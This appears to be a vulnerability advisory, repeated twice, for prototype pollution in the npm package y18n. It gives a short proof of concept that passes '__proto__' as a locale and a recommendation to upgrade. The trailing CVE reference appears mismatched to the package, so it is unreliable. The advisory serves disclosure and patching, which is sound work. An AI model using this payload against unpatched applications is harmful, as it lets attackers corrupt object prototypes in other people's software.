The package y18n before 3.2.2, 4.0.1 and 5.0.5, is vulnerable to Prototype Pollution.
Prototype Pollution in y18n ### Overview The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution. ### POC const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true ### Recommendation Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.
The package y18n before 3.2.2, 4.0.1 and 5.0.5, is vulnerable to Prototype Pollution.
Prototype Pollution in y18n ### Overview The npm package
y18nbefore versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution. ### POCconst y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true### Recommendation Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.https://nvd.nist.gov/vuln/detail/CVE-2022-0691